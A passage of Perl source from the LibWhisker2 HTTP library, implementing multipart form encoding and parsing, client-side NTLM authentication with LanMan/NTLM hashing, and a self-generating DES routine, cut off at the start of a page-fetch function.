= @_;\n    return if ( !ref($hr) );    # error check\n    return undef if ( !defined $n || $n eq '' );\n    $$hr{$n} = $v;\n}\n\n########################################################################\n\n=item B<multipart_get>\n\nParams: \\%multi_hash, $param_name\n\nReturn: $param_value, undef on error\n\nThis function retrieves the named parameter to the given value within the\nsupplied multipart hash.  There is a special case where the named\nparameter is actually a file--in which case the resulting value will be\n\"\\0FILE\".  In general, all special values will be prefixed with a NULL\ncharacter.  In order to get a file's info, use multipart_getfile().\n\n=cut\n\nsub multipart_get {\n    my ( $hr, $n ) = @_;\n    return undef if ( !ref($hr) );                 # error check\n    return undef if ( !defined $n || $n eq '' );\n    return $$hr{$n};\n}\n\n########################################################################\n\n=item B<multipart_setfile>\n\nParams: \\%multi_hash, $param_name, $file_path [, $filename]\n\nReturn: undef on error, 1 on success\n\nNOTE: this function does not actually add the contents of $file_path into\nthe %multi_hash; instead, multipart_write() inserts the content when\ngenerating the final request.\n\n=cut\n\nsub multipart_setfile {\n    my ( $hr, $n, $path ) = ( shift, shift, shift );\n    my ($fname) = shift;\n\n    return undef if ( !ref($hr) );                 # error check\n    return undef if ( !defined $n || $n eq '' );\n    return undef if ( !defined $path );\n    return undef if ( !( -e $path && -f $path ) );\n\n    if ( !defined $fname ) {\n        $path =~ m/[\\\\\\/]([^\\\\\\/]+)$/;\n        $fname = $1 || \"whisker-file\";\n    }\n\n    $$hr{$n} = \"\\0FILE\";\n    $$hr{\"\\0$n\"} = [ $path, $fname ];\n    return 1;\n}\n\n########################################################################\n\n=item B<multipart_getfile>\n\nParams: \\%multi_hash, $file_param_name\n\nReturn: $path, $name ($path=undef on error)\n\nmultipart_getfile is used to retrieve information for a file\nparameter contained in %multi_hash.  To use this you would most\nlikely do:\n\n ($path,$fname)=LW2::multipart_getfile(\\%multi,\"param_name\");\n\n=cut\n\nsub multipart_getfile {\n    my ( $hr, $n ) = @_;\n\n    return undef if ( !ref($hr) );                                 # error check\n    return undef if ( !defined $n || $n eq '' );\n    return undef if ( !defined $$hr{$n} || $$hr{$n} ne \"\\0FILE\" );\n\n    return @{ $$hr{\"\\0$n\"} };\n}\n\n########################################################################\n\n=item B<multipart_boundary>\n\nParams: \\%multi_hash [, $new_boundary_name]\n\nReturn: $current_boundary_name\n\nmultipart_boundary is used to retrieve, and optionally set, the\nmultipart boundary used for the request.\n\nNOTE: the function does no checking on the supplied boundary, so if\nyou want things to work make sure it's a legit boundary.  Libwhisker\ndoes *not* prefix it with any '---' characters.\n\n=cut\n\nsub multipart_boundary {\n    my ( $hr, $new ) = @_;\n    my $ret;\n\n    return undef if ( !ref($hr) );    # error check\n\n    if ( !defined $$hr{\"\\0BOUNDARY\"} ) {\n\n        # create boundary on the fly\n        my $b  = uc( utils_randstr(20) );\n        my $b2 = '-' x 32;\n        $$hr{\"\\0BOUNDARY\"} = \"$b2$b\";\n    }\n\n    $ret = $$hr{\"\\0BOUNDARY\"};\n    if ( defined $new ) {\n        $$hr{\"\\0BOUNDARY\"} = $new;\n    }\n\n    return $ret;\n}\n\n########################################################################\n\n=item B<multipart_write>\n\nParams: \\%multi_hash, \\%request\n\nReturn: 1 if successful, undef on error\n\nmultipart_write is used to parse and construct the multipart data\ncontained in %multi_hash, and place it ready to go in the given whisker\nhash (%request) structure, to be sent to the server.\n\nNOTE: file contents are read into the final %request, so it's possible for\nthe hash to get *very* large if you have (a) large file(s).\n\n=cut\n\nsub multipart_write {\n    my ( $mp, $hr ) = @_;\n\n    return undef if ( !ref($mp) );    # error check\n    return undef if ( !ref($hr) );    # error check\n\n    if ( !defined $$mp{\"\\0BOUNDARY\"} ) {\n\n        # create boundary on the fly\n        my $b  = uc( utils_randstr(20) );\n        my $b2 = '-' x 32;\n        $$mp{\"\\0BOUNDARY\"} = \"$b2$b\";\n    }\n\n    my $B   = $$mp{\"\\0BOUNDARY\"};\n    my $EOL = $$hr{whisker}->{http_eol} || \"\\x0d\\x0a\";\n\n    my $keycount = 0;\n    foreach ( keys %$mp ) {\n        next if ( substr( $_, 0, 1 ) eq \"\\0\" );\n        $keycount++;\n        if ( $$mp{$_} eq \"\\0FILE\" ) {\n            my ( $path, $name ) = multipart_getfile( $mp, $_ );\n            next if ( !defined $path );\n            $$hr{whisker}->{data} .= \"$B$EOL\";\n            $$hr{whisker}->{data} .=\n              \"Content-Disposition: \" . \"form-data; name=\\\"$_\\\"; \";\n            $$hr{whisker}->{data} .= \"filename=\\\"$name\\\"$EOL\";\n            $$hr{whisker}->{data} .=\n              \"Content-Type: \" . \"application/octet-stream$EOL\";\n            $$hr{whisker}->{data} .= $EOL;\n            next if ( !open( IN, \"<$path\" ) );\n            binmode(IN);    # stupid Windows\n\n            while (<IN>) {\n                $$hr{whisker}->{data} .= $_;\n            }\n            close(IN);\n            $$hr{whisker}->{data} .= $EOL;    # WARNING: is this right?\n        }\n        else {\n            $$hr{whisker}->{data} .= \"$B$EOL\";\n            $$hr{whisker}->{data} .=\n              \"Content-Disposition: \" . \"form-data; name=\\\"$_\\\"$EOL\";\n            $$hr{whisker}->{data} .= \"$EOL$$mp{$_}$EOL\";\n        }\n    }\n\n    if ($keycount) {\n        $$hr{whisker}->{data} .= \"$B--$EOL\";    # closing boundary\n        $$hr{\"Content-Length\"} = length( $$hr{whisker}->{data} );\n        $$hr{\"Content-Type\"}   = \"multipart/form-data; boundary=$B\";\n        return 1;\n    }\n    else {\n\n        # multipart hash didn't contain params to upload\n        return undef;\n    }\n}\n\n########################################################################\n\n=item B<multipart_read>\n\nParams: \\%multi_hash, \\%hout_response [, $filepath ]\n\nReturn: 1 if successful, undef on error\n\nmultipart_read will parse the data contents of the supplied\n%hout_response hash, by passing the appropriate info to\nmultipart_read_data().  Please see multipart_read_data() for more\ninfo on parameters and behaviour.\n\nNOTE: this function will return an error if the given %hout_response\nContent-Type is not set to \"multipart/form-data\".\n\n=cut\n\nsub multipart_read {\n    my ( $mp, $hr, $fp ) = @_;\n\n    return undef if ( !( defined $mp && ref($mp) ) );\n    return undef if ( !( defined $hr && ref($hr) ) );\n\n    my $ctype = utils_find_lowercase_key( $hr, 'content-type' );\n    return undef if ( !defined $ctype );\n    return undef if ( $ctype !~ m#^multipart/form-data#i );\n\n    return multipart_read_data( $mp, \\$$hr{'whisker'}->{'data'}, undef, $fp );\n\n}\n\n########################################################################\n\n=item B<multipart_read_data>\n\nParams: \\%multi_hash, \\$data, $boundary [, $filepath ]\n\nReturn: 1 if successful, undef on error\n\nmultipart_read_data parses the contents of the supplied data using\nthe given boundary and puts the values in the supplied %multi_hash.\nEmbedded files will *not* be saved unless a $filepath is given, which\nshould be a directory suitable for writing out temporary files.\n\nNOTE: currently only application/octet-stream is the only supported\nfile encoding.  All other file encodings will not be parsed/saved.\n\n=cut\n\nsub multipart_read_data {\n    my ( $mp, $dr, $bound, $fp ) = @_;\n\n    return undef if ( !( defined $mp && ref($mp) ) );\n    return undef if ( !( defined $dr && ref($dr) ) );\n\n    # if $bound is undef, then we'll snag what looks to be\n    # the first boundary from the data.\n    if ( !defined $bound ) {\n        if ( $$dr =~ /([-]{5,}[A-Z0-9]+)[\\r\\n]/i ) {\n            $bound = $1;\n        }\n        else {\n\n            # we didn't spot a typical boundary; error\n            return undef;\n        }\n    }\n\n    if ( defined $fp && !( -d $fp && -w $fp ) ) {\n        $fp = undef;\n    }\n\n    my $line = utils_getline_crlf( $dr, 0 );\n    return undef if ( !defined $line );\n    return undef if ( index( $line, $bound ) != 0 );\n\n    my $done = 0;\n    while ( !$done ) {\n        $done = _multipart_read_data_part( $mp, $dr, $bound, $fp );\n    }\n\n    return 1;\n}\n\n########################################################################\n\nsub _multipart_read_data_part {\n    my ( $mp, $dr, $bound, $fp ) = @_;\n\n    my $dispinfo = utils_getline_crlf($dr);\n    return 1 if ( !defined $dispinfo );\n    return 1 if ( length($dispinfo) == 0 );\n    my $lcdisp = lc($dispinfo);\n\n    if ( index( $lcdisp, 'content-disposition: form-data;' ) != 0 ) {\n        return 1;\n    }    # bad disposition\n\n    my ( $s, $e, $l );\n\n    $s = index( $lcdisp, 'name=\"', 30 );\n    $e = index( $lcdisp, '\"',      $s + 6 );\n    return 1 if ( $s == -1 || $e == -1 );\n    my $NAME = substr( $dispinfo, $s + 6, $e - $s - 6 );\n\n    $s = index( $lcdisp, 'filename=\"', $e );\n    my $FILENAME = undef;\n    if ( $s != -1 ) {\n        $e = index( $lcdisp, '\"', $s + 10 );\n        return 1 if ( $e == -1 );    # puke; malformed filename\n        $FILENAME = substr( $dispinfo, $s + 10, $e - $s - 10 );\n        $s        = rindex( $FILENAME, '\\\\' );\n        $e        = rindex( $FILENAME, '/' );\n        $s = $e if ( $e > $s );\n        $FILENAME = substr( $FILENAME, $s + 1, length($FILENAME) - $s );\n    }\n\n    my $CTYPE = utils_getline_crlf($dr);\n\n    return 1 if ( !defined $CTYPE );\n    $CTYPE = lc($CTYPE);\n\n    if ( length($CTYPE) > 0 ) {\n        $s = index( $CTYPE, 'content-type:' );\n        return 1 if ( $s != 0 );    # bad ctype line\n        $CTYPE = substr( $CTYPE, 13, length($CTYPE) - 13 );\n        $CTYPE =~ tr/ \\t//d;\n        my $xx = utils_getline_crlf($dr);\n        return 1 if ( !defined $xx );\n        return 1 if ( length($xx) > 0 );\n    }\n    else {\n        $CTYPE = 'application/octet-stream';\n    }\n\n    my $VALUE = '';\n    while ( defined( $l = utils_getline_crlf($dr) ) ) {\n        last if ( index( $l, $bound ) == 0 );\n        $VALUE .= $l;\n        $VALUE .= \"\\r\\n\";\n    }\n\n    substr( $VALUE, -2, 2 ) = '';\n\n    if ( !defined $FILENAME ) {    # read in param\n        $$mp{$NAME} = $VALUE;\n        return 0;\n\n    }\n    else {                         # read in file\n        $$mp{$NAME} = \"\\0FILE\";\n        return 0 if ( !defined $fp );\n\n        # TODO: funky content types, like application/x-macbinary\n        if ( $CTYPE ne 'application/octet-stream' ) {\n            return 0;\n        }\n\n        my $rfn      = lc( utils_randstr(12) );\n        my $fullpath = \"$fp$rfn\";\n\n        $$mp{\"\\0$NAME\"} = [ undef, $FILENAME ];\n        return 0 if ( !open( OUT, \">$fullpath\" ) );    # error opening file\n        binmode(OUT);                                  # stupid Windows\n        $$mp{\"\\0$NAME\"} = [ $fullpath, $FILENAME ];\n        print OUT $VALUE;\n        close(OUT);\n\n        return 0;\n\n    }    # if !defined $FILENAME\n\n    return 0;    # um, this should never be reached...\n}\n\n########################################################################\n\n=item B<multipart_files_list>\n\nParams: \\%multi_hash\n\nReturn: @files\n\nmultipart_files_list returns an array of parameter names for all\nthe files that are contained in %multi_hash.\n\n=cut\n\nsub multipart_files_list {\n    my ($mp) = shift;\n    my @ret;\n\n    return () if ( !( defined $mp && ref($mp) ) );\n    while ( my ( $K, $V ) = each(%$mp) ) {\n        push( @ret, $K ) if ( $V eq \"\\0FILE\" );\n    }\n    return @ret;\n}\n\n########################################################################\n\n=item B<multipart_params_list>\n\nParams: \\%multi_hash\n\nReturn: @params\n\nmultipart_files_list returns an array of parameter names for all\nthe regular parameters (non-file) that are contained in %multi_hash.\n\n=cut\n\nsub multipart_params_list {\n    my ($mp) = shift;\n    my @ret;\n\n    return () if ( !( defined $mp && ref($mp) ) );\n    while ( my ( $K, $V ) = each(%$mp) ) {\n        push( @ret, $K ) if ( $V ne \"\\0FILE\"\n            && substr( $K, 0, 1 ) ne \"\\0\" );\n    }\n    return @ret;\n}\n\n########################################################################\n\n\n########################################################################\n\n=item B<ntlm_new>\n\nParams: $username, $password [, $domain, $ntlm_only]\n\nReturn: $ntlm_object\n\nReturns a reference to an array (otherwise known as the 'ntlm object')\nwhich contains the various information specific to a user/pass combo.\nIf $ntlm_only is set to 1, then only the NTLM hash (and not the LanMan\nhash) will be generated.  This results in a speed boost, and is typically\nfine for using against IIS servers.\n\nThe array contains the following items, in order:\nusername, password, domain, lmhash(password), ntlmhash(password)\n\n=cut\n\nsub ntlm_new {\n    my ( $user, $pass, $domain, $flag ) = @_;\n    $flag ||= 0;\n    return undef if ( !defined $user );\n    $pass   ||= '';\n    $domain ||= '';\n    my @a = ( \"$user\", \"$pass\", \"$domain\", undef, undef );\n    my $t;\n\n    if ( $flag == 0 ) {\n        $t = substr( $pass, 0, 14 );\n        $t =~ tr/a-z/A-Z/;\n        $t .= \"\\0\" x ( 14 - length($t) );\n        $a[3] = des_E_P16($t);    # LanMan password hash\n        $a[3] .= \"\\0\" x ( 21 - length( $a[3] ) );\n    }\n\n    $t = md4( encode_unicode($pass) );\n    $t =~ s/([a-z0-9]{2})/sprintf(\"%c\",hex($1))/ieg;\n    $t .= \"\\0\" x ( 21 - length($t) );\n    $a[4] = $t;                   # NTLM password hash\n\n    &des_cache_reset();           # reset the keys hash\n    return \\@a;\n}\n\n########################################################################\n\nsub ntlm_generate_responses {\n    my ( $obj, $chal ) = @_;\n    return ( undef, undef ) if ( !defined $obj || !defined $chal );\n    return ( undef, undef ) if ( !ref($obj) );\n    my $x = '';\n    $x = des_E_P24( $obj->[3], $chal ) if ( defined $obj->[3] );\n    return ( $x, des_E_P24( $obj->[4], $chal ) );\n}\n\n########################################################################\n\n=item B<ntlm_decode_challenge>\n\nParams: $challenge\n\nReturn: @challenge_parts\n\nSplits the supplied challenge into the various parts.  The returned array\ncontains elements in the following order:\n\nunicode_domain, ident, packet_type, domain_len, domain_maxlen,\ndomain_offset, flags, challenge_token, reserved, empty, raw_data\n\n=cut\n\nsub ntlm_decode_challenge {\n    return undef if ( !defined $_[0] );\n    my $chal = shift;\n    my @res;\n\n    @res = unpack( 'Z8VvvVVa8a8a8', substr( $chal, 0, 48 ) );\n    push( @res, substr( $chal, 48 ) );\n    unshift( @res, substr( $chal, $res[4], $res[2] ) );\n    return @res;\n}\n\n########################################################################\n\nsub ntlm_header {\n    my ( $s, $h, $o ) = @_;\n    my $l = length($s);\n    return pack( 'vvV', 0, 0, $o - $h ) if ( $l == 0 );\n    return pack( 'vvV', $l, $l, $o );\n}\n\n########################################################################\n\n=item B<ntlm_client>\n\nParams: $ntlm_obj [, $server_challenge]\n\nReturn: $response\n\nntlm_client() is responsible for generating the base64-encoded text you\ninclude in the HTTP Authorization header.  If you call ntlm_client()\nwithout a $server_challenge, the function will return the initial NTLM\nrequest packet (message packet #1).  You send this to the server, and\ntake the server's response (message packet #2) and pass that as\n$server_challenge, causing ntlm_client() to generate the final response\npacket (message packet #3).\n\nNote: $server_challenge is expected to be base64 encoded.\n\n=cut\n\nsub ntlm_client {\n    my ( $obj, $p ) = @_;\n    my $resp = \"NTLMSSP\\0\";\n\n    return undef if ( !defined $obj || !ref($obj) );\n\n    if ( defined $p && $p ne '' ) {    # answer challenge\n        $p =~ tr/ \\t\\r\\n//d;\n        $p = decode_base64($p);\n        my @c  = ntlm_decode_challenge($p);\n        my $uu = encode_unicode( $obj->[0] );    # username\n        $resp .= pack( 'V', 3 );\n        my ( $hl, $hn ) = ntlm_generate_responses( $obj, $c[7] );    # token\n        return undef if ( !defined $hl || !defined $hn );\n        my $o = 64;\n        $resp .= ntlm_header( $hl, 64, $o );                         # LM hash\n        $resp .= ntlm_header( $hn, 64, ( $o += length($hl) ) );      # NTLM hash\n        $resp .= ntlm_header( $c[0], 64, ( $o += length($hn) ) );    # domain\n        $resp .= ntlm_header( $uu, 64, ( $o += length( $c[0] ) ) );  # username\n        $resp .= ntlm_header( $uu, 64, ( $o += length($uu) ) );    # workstation\n        $resp .= ntlm_header( '', 64, ( $o += length($uu) ) );     # session\n        $resp .= pack( 'V', $c[6] );\n        $resp .= $hl . $hn . $c[0] . $uu . $uu;\n\n    }\n    else {    # initiate challenge\n        $resp .= pack( 'VV', 1, 0x0000b207 );\n        $resp .= ntlm_header( $obj->[0], 32, 32 );\n        $resp .= ntlm_header( $obj->[2], 32, 32 + length( $obj->[0] ) );\n        $resp .= $obj->[0] . $obj->[2];\n    }\n\n    return encode_base64( $resp, '' );\n}\n\n########################################################################\n\nsub _ntlm_auth_callback {\n    my ( $stream, $hi, $ho, $pflag ) = @_;\n    my ( $ntlmobj, $header, $req_pre, $req_post, $aheader, $work, $ecode );\n    my ($rheader);\n    $pflag ||= 0;\n\n    if ($pflag) {\n        $ntlmobj                  = $$hi{whisker}->{auth_proxy_data};\n        $header                   = 'Proxy-Authorization';\n        $rheader                  = 'proxy-authenticate';\n        $ecode                    = 407;\n        $hi->{'Proxy-Connection'} = 'Keep-Alive';\n    }\n    else {\n        $ntlmobj          = $$hi{whisker}->{auth_data};\n        $header           = 'Authorization';\n        $rheader          = 'www-authenticate';\n        $ecode            = 401;\n        $hi->{Connection} = 'Keep-Alive';\n    }\n\n    $ho->{whisker}->{error} = 'NTLM ' . $header;\n    $hi->{$header} = 'NTLM ' . ntlm_client($ntlmobj);\n    my $ret = _http_do_request_ex( $stream, $hi, $ho );\n    return $ret if ($ret);\n    return 200  if ( $$ho{whisker}->{code} == 200 );\n    return 1    if ( $$ho{whisker}->{code} != $ecode );\n\n    my $thead = utils_find_lowercase_key( $ho, $rheader );\n    return 1 if ( !defined $thead );\n\n    my ( $found, @auths );\n    if ( ref($thead) ) { @auths = @$thead; }\n    else { push @auths, $thead; }\n    foreach (@auths) {\n        $found = $1 if (m/^NTLM (.+)$/);\n    }\n    return 1 if ( !defined $found );\n\n    $hi->{$header} = 'NTLM ' . ntlm_client( $ntlmobj, $found );\n    push @{ $hi->{whisker}->{header_delete_on_success} }, $header;\n    return 0;\n}\n\nsub _ntlm_auth_proxy_callback {\n    return _ntlm_auth_callback( $_[0], $_[1], $_[2], 1 );\n}\n\n########################################################################\n\n{    # start of DES local container #######################################\n    my $generated = 0;\n    my $perm1     = [\n        57, 49, 41, 33, 25, 17, 9,  1,  58, 50, 42, 34, 26, 18,\n        10, 2,  59, 51, 43, 35, 27, 19, 11, 3,  60, 52, 44, 36,\n        63, 55, 47, 39, 31, 23, 15, 7,  62, 54, 46, 38, 30, 22,\n        14, 6,  61, 53, 45, 37, 29, 21, 13, 5,  28, 20, 12, 4\n    ];\n    my $perm2 = [\n        14, 17, 11, 24, 1,  5,  3,  28, 15, 6,  21, 10, 23, 19, 12, 4,\n        26, 8,  16, 7,  27, 20, 13, 2,  41, 52, 31, 37, 47, 55, 30, 40,\n        51, 45, 33, 48, 44, 49, 39, 56, 34, 53, 46, 42, 50, 36, 29, 32\n    ];\n    my $perm3 = [\n        58, 50, 42, 34, 26, 18, 10, 2, 60, 52, 44, 36, 28, 20, 12, 4,\n        62, 54, 46, 38, 30, 22, 14, 6, 64, 56, 48, 40, 32, 24, 16, 8,\n        57, 49, 41, 33, 25, 17, 9,  1, 59, 51, 43, 35, 27, 19, 11, 3,\n        61, 53, 45, 37, 29, 21, 13, 5, 63, 55, 47, 39, 31, 23, 15, 7\n    ];\n    my $perm4 = [\n        32, 1,  2,  3,  4,  5,  4,  5,  6,  7,  8,  9,  8,  9,  10, 11,\n        12, 13, 12, 13, 14, 15, 16, 17, 16, 17, 18, 19, 20, 21, 20, 21,\n        22, 23, 24, 25, 24, 25, 26, 27, 28, 29, 28, 29, 30, 31, 32, 1\n    ];\n    my $perm5 = [\n        16, 7, 20, 21, 29, 12, 28, 17, 1,  15, 23, 26, 5,  18, 31, 10,\n        2,  8, 24, 14, 32, 27, 3,  9,  19, 13, 30, 6,  22, 11, 4,  25\n    ];\n    my $perm6 = [\n        40, 8, 48, 16, 56, 24, 64, 32, 39, 7, 47, 15, 55, 23, 63, 31,\n        38, 6, 46, 14, 54, 22, 62, 30, 37, 5, 45, 13, 53, 21, 61, 29,\n        36, 4, 44, 12, 52, 20, 60, 28, 35, 3, 43, 11, 51, 19, 59, 27,\n        34, 2, 42, 10, 50, 18, 58, 26, 33, 1, 41, 9,  49, 17, 57, 25\n    ];\n    my $sc = [ 1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1 ];\n\n    sub des_E_P16 {\n        my ($p14) = @_;\n        my $sp8 = [ 0x4b, 0x47, 0x53, 0x21, 0x40, 0x23, 0x24, 0x25 ];\n        my $p7 = substr( $p14, 0, 7 );\n        my $p16 = des_smbhash( $sp8, $p7 );\n        $p7 = substr( $p14, 7, 7 );\n        $p16 .= des_smbhash( $sp8, $p7 );\n        return $p16;\n    }\n\n    sub des_E_P24 {\n        my ( $p21, $c8_str ) = @_;\n        my @c8 = map { ord($_) } split( //, $c8_str );\n        my $p24 = des_smbhash( \\@c8, substr( $p21, 0, 7 ) );\n        $p24 .= des_smbhash( \\@c8, substr( $p21, 7,  7 ) );\n        $p24 .= des_smbhash( \\@c8, substr( $p21, 14, 7 ) );\n    }\n\n    sub des_permute {\n        my ( $i, $out, $in, $p, $n ) = ( 0, @_ );\n        foreach $i ( 0 .. ( $n - 1 ) ) {\n            $out->[$i] = $in->[ $p->[$i] - 1 ];\n        }\n    }\n\n    sub des_lshift {\n        my ( $c, $d, $count ) = @_;\n        my ( @outc, @outd, $i, $x );\n        while ( $count-- ) {\n            push @$c, shift @$c;\n            push @$d, shift @$d;\n        }\n    }\n\n    my %dohash_cache;    # cache for key data; saves some cycles\n    my %key_cache;       # another cache for key data\n\n    sub des_cache_reset {\n        %dohash_cache = ();\n        %key_cache    = ();\n    }\n\n    sub des_dohash {\n        my ( $out, $in, $key ) = @_;\n        my ( $i, $j, $k, @pk1, @c, @d, @cd, @ki, @pd1, @l, @r, @rl );\n\n        # if(!defined $dohash_cache{$skey}){\n        &des_permute( \\@pk1, $key, $perm1, 56 );\n\n        for ( $i = 0 ; $i < 28 ; $i++ ) {\n            $c[$i] = $pk1[$i];\n            $d[$i] = $pk1[ $i + 28 ];\n        }\n        for ( $i = 0 ; $i < 16 ; $i++ ) {\n            my @array;\n            &des_lshift( \\@c, \\@d, $sc->[$i] );\n            @cd = ( @c, @d );\n            &des_permute( \\@array, \\@cd, $perm2, 48 );\n            $ki[$i] = \\@array;\n\n            #    $dohash_cache{$skey}->[$i]=\\@array;\n        }\n\n        # } else {\n        #\tfor($i=0;$i<16;$i++){\n        #\t\t$ki[$i]=$dohash_cache{$skey}->[$i];}\n        # }\n\n        des_dohash2( $in, \\@l, \\@r, \\@ki );\n\n        @rl = ( @r, @l );\n        &des_permute( $out, \\@rl, $perm6, 64 );\n    }\n\n    sub des_str_to_key {\n        my ($str) = @_;\n        my ( $i, @key, $out, @str );\n        unshift( @str, ord($_) ) while ( $_ = chop($str) );\n        $key[0] = $str[0] >> 1;\n        $key[1] = ( ( $str[0] & 0x01 ) << 6 ) | ( $str[1] >> 2 );\n        $key[2] = ( ( $str[1] & 0x03 ) << 5 ) | ( $str[2] >> 3 );\n        $key[3] = ( ( $str[2] & 0x07 ) << 4 ) | ( $str[3] >> 4 );\n        $key[4] = ( ( $str[3] & 0x0f ) << 3 ) | ( $str[4] >> 5 );\n        $key[5] = ( ( $str[4] & 0x1f ) << 2 ) | ( $str[5] >> 6 );\n        $key[6] = ( ( $str[5] & 0x3f ) << 1 ) | ( $str[6] >> 7 );\n        $key[7] = $str[6] & 0x7f;\n        foreach $i ( 0 .. 7 ) {\n            $key[$i] = 0xff & ( $key[$i] << 1 );\n        }\n        @{ $key_cache{$str} } = @key;\n        return \\@key;\n    }\n\n    sub des_smbhash {\n        my ( $in, $key ) = @_;\n        my $key2;\n\n        &des_generate if ( !$generated );\n        if ( defined $key_cache{$key} ) {\n            $key2 = $key_cache{$key};\n        }\n        else { $key2 = &des_str_to_key($key); }\n\n        my ( $i, $div, $mod, @in, @outb, @inb, @keyb, @out );\n        foreach $i ( 0 .. 63 ) {\n            $div = int( $i / 8 );\n            $mod = $i % 8;\n            $inb[$i]  = ( $in->[$div] &   ( 1 << ( 7 - ($mod) ) ) ) ? 1 : 0;\n            $keyb[$i] = ( $key2->[$div] & ( 1 << ( 7 - ($mod) ) ) ) ? 1 : 0;\n            $outb[$i] = 0;\n        }\n        &des_dohash( \\@outb, \\@inb, \\@keyb );\n        foreach $i ( 0 .. 7 ) { $out[$i] = 0; }\n        foreach $i ( 0 .. 63 ) {\n            $out[ int( $i / 8 ) ] |= ( 1 << ( 7 - ( $i % 8 ) ) )\n              if ( $outb[$i] );\n        }\n        my $out = pack( \"C8\", @out );\n\n        return $out;\n    }\n\n    sub des_generate {    # really scary dragons here....this code is optimized\n                          # for speed, and not readability\n        my ( $i, $j );\n        my $code = <<EOT;\n{ my \\$sbox = [[\n[14,4,13,1,2,15,11,8,3,10,6,12,5,9,0,7],[0,15,7,4,14,2,13,1,10,6,12,11,9,5,3,8],\n[4,1,14,8,13,6,2,11,15,12,9,7,3,10,5,0],[15,12,8,2,4,9,1,7,5,11,3,14,10,0,6,13]\n],[\n[15,1,8,14,6,11,3,4,9,7,2,13,12,0,5,10],[3,13,4,7,15,2,8,14,12,0,1,10,6,9,11,5],\n[0,14,7,11,10,4,13,1,5,8,12,6,9,3,2,15],[13,8,10,1,3,15,4,2,11,6,7,12,0,5,14,9]\n],[\n[10,0,9,14,6,3,15,5,1,13,12,7,11,4,2,8],[13,7,0,9,3,4,6,10,2,8,5,14,12,11,15,1],\n[13,6,4,9,8,15,3,0,11,1,2,12,5,10,14,7],[1,10,13,0,6,9,8,7,4,15,14,3,11,5,2,12]\n],[\n[7,13,14,3,0,6,9,10,1,2,8,5,11,12,4,15],[13,8,11,5,6,15,0,3,4,7,2,12,1,10,14,9],\n[10,6,9,0,12,11,7,13,15,1,3,14,5,2,8,4],[3,15,0,6,10,1,13,8,9,4,5,11,12,7,2,14]\n],[\n[2,12,4,1,7,10,11,6,8,5,3,15,13,0,14,9],[14,11,2,12,4,7,13,1,5,0,15,10,3,9,8,6],\n[4,2,1,11,10,13,7,8,15,9,12,5,6,3,0,14],[11,8,12,7,1,14,2,13,6,15,0,9,10,4,5,3]\n],[\n[12,1,10,15,9,2,6,8,0,13,3,4,14,7,5,11],[10,15,4,2,7,12,9,5,6,1,13,14,0,11,3,8],\n[9,14,15,5,2,8,12,3,7,0,4,10,1,13,11,6],[4,3,2,12,9,5,15,10,11,14,1,7,6,0,8,13]\n],[\n[4,11,2,14,15,0,8,13,3,12,9,7,5,10,6,1],[13,0,11,7,4,9,1,10,14,3,5,12,2,15,8,6],\n[1,4,11,13,12,3,7,14,10,15,6,8,0,5,9,2],[6,11,13,8,1,4,10,7,9,5,0,15,14,2,3,12]\n],[\n[13,2,8,4,6,15,11,1,10,9,3,14,5,0,12,7],[1,15,13,8,10,3,7,4,12,5,6,11,0,14,9,2],\n[7,11,4,1,9,12,14,2,0,6,10,13,15,3,5,8],[2,1,14,7,4,10,8,13,15,12,9,0,3,5,6,11]\n]];\nEOT\n\n        $code .=\n          'sub des_dohash2 { my ($in,$l,$r,$ki)=@_; my (@p,$i,$j,$k,$m,$n);';\n        for ( $i = 0 ; $i < 64 ; $i++ ) {\n            $code .= \"\\$p[$i] = \\$in->[\" . ( $perm3->[$i] - 1 ) . \"];\\n\";\n        }\n        for ( $i = 0 ; $i < 32 ; $i++ ) {\n            $code .= \"\\$l->[$i]=\\$p[$i]; \\$r->[$i]=\\$p[\" . ( $i + 32 ) . \"];\\n\";\n        }\n        $code .= 'for($i=0;$i<16;$i++){ local (@er,@erk,@b,@cb,@pcb,@r2);';\n        for ( $i = 0 ; $i < 48 ; $i++ ) {\n            $code .=\n                \"\\$erk[$i]=\\$r->[\"\n              . ( $perm4->[$i] - 1 )\n              . \"]^(\\$ki->[\\$i]->[$i]);\\n\";\n        }\n        for ( $i = 0 ; $i < 8 ; $i++ ) {\n            for ( $j = 0 ; $j < 6 ; $j++ ) {\n                $code .= \"\\$b[$i][$j]=\\$erk[\" . ( $i * 6 + $j ) . \"];\\n\";\n            }\n        }\n        for ( $i = 0 ; $i < 8 ; $i++ ) {\n            $code .= \"\\$m=(\\$b[$i][0]<<1)|\\$b[$i][5];\\n\";\n            $code .=\n\"\\$n=(\\$b[$i][1]<<3)|(\\$b[$i][2]<<2)|(\\$b[$i][3]<<1)|\\$b[$i][4];\\n\";\n            for ( $j = 0 ; $j < 4 ; $j++ ) {\n                $code .=\n                    \"\\$b[$i][$j]=(\\$sbox->[$i][\\$m][\\$n]&\"\n                  . ( 1 << ( 3 - $j ) )\n                  . \")?1:0;\\n\";\n            }\n        }\n        for ( $i = 0 ; $i < 8 ; $i++ ) {\n            for ( $j = 0 ; $j < 4 ; $j++ ) {\n                $code .= \"\\$cb[\" . ( $i * 4 + $j ) . \"]=\\$b[$i][$j];\\n\";\n            }\n        }\n        for ( $i = 0 ; $i < 32 ; $i++ ) {\n            $code .= \"\\$pcb[$i]=\\$cb[\" . ( $perm5->[$i] - 1 ) . \"];\\n\";\n        }\n        for ( $i = 0 ; $i < 32 ; $i++ ) {\n            $code .= \"\\$r2[$i]=(\\$l->[$i])^\\$pcb[$i];\\n\";\n        }\n        for ( $i = 0 ; $i < 32 ; $i++ ) {\n            $code .= \"\\$l->[$i]=\\$r->[$i]; \\$r->[$i]=\\$r2[$i];\\n\";\n        }\n        $code .= '}}}';\n\n        eval \"$code\";\n        #print \"DEBUG: $code\\n\\n\";\n        $generated++;\n    }\n\n}    ##### end of DES container ################################################\n\n\n########################################################################\n\n=item B<get_page>\n\nParams: $url [, \\%request]\n\nReturn: $code, $data ($code will be set to undef on error, $data will\n\t\t\tcontain error message)\n\nThis function will fetch the page at the given URL, and return the HTTP response code\nand page contents.  Use this in the form of:\n($code,$html)=LW2::get_page(\"http://host.com/page.html\")\n\nThe optional %request will be used if supplied.  This allows you to set\nheaders and other parameters.\n\n=cut\n\nsub get_page {\n    my ( $URL, $hr ) = ( shift, shift );\n    return ( undef, 'No URL supplied' ) if ( length($URL) == 0 );\n\n    my ( %req, %resp );\n    my $rptr;\n\n    if ( defined $hr && ref($hr) ) {\n        $rptr = $hr;\n    }\n    else {\n        